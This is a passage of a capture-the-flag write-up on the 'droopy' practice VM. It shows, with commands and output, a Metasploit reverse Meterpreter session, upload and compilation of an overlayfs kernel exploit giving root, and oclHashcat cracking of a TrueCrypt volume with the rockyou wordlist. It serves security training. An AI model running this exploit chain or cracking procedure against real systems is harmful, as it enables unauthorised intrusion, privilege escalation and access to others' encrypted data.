[*] 192.168.1.159:80 - Getting tokens from create new article page
[*] 192.168.1.159:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Good news; let's look around and get information out of the system. I used the sysinfo command; let's see what it is.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I am trying my luck and checking whether this machine is vulnerable to the overlayfs vulnerability or not, what user permissions I have, and whether I am able to compile my exploit with gcc and run it.

First, transfer the exploit to the /tmp folder with meterpreter's upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system; let's find the flag. Usually the flag is in the root directory, so let's see what we have.

[screenshot: dave.tc]

Dave.tc? Wut? After googling a bit I found that the .tc extension could be a TrueCrypt password-protected file. Google says that TrueCrypt is discontinued and password-protected volumes can be cracked with the proper program and a good dictionary. My first thought was oclHashcat because I have an AMD card, and truecrack in Kali Linux supports Nvidia cards (only?). I did not research whether it supports AMD too, because I am happy with oclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It's fun to read other people's email.

Okay, I have the rockyou wordlist, so check /var/mail:

[screenshot: mail]

Okay, let's rock:

oclHashcat64.exe -a 0 -m 6211 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

Exhausted. Nothing. Several hours later, still nothing. I tried applying rules (best64) and different dictionaries; nothing. The last sentence could also be a hint, so I did a dictionary combination attack (downloaded lyrics from The Jam, built a dictionary from them and combined it with rockyou). Still no luck. Will I fail at this point? It was so easy until now. TRY HARDER! So I took a break, and when I sat in front of my computer again I had a clue. What if I am trying the wrong hashing algorithm? Some people on the hashcat forums mentioned that one should try the SHA512 algorithm instead of RIPEMD160. Okay, fire up oclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

After a couple of minutes it finished. Cracked. Okay, let's install TrueCrypt and check what we got. When it prompted for the password I tried copy/paste and... Wrong password. OMG, what is happening? Again Ctrl+C Ctrl+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted as drive H:

[screenshot: drive]

Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

I opened this one and under the .top folder I captured the flag.

[screenshot: flag]

This was quite fun! Thank you!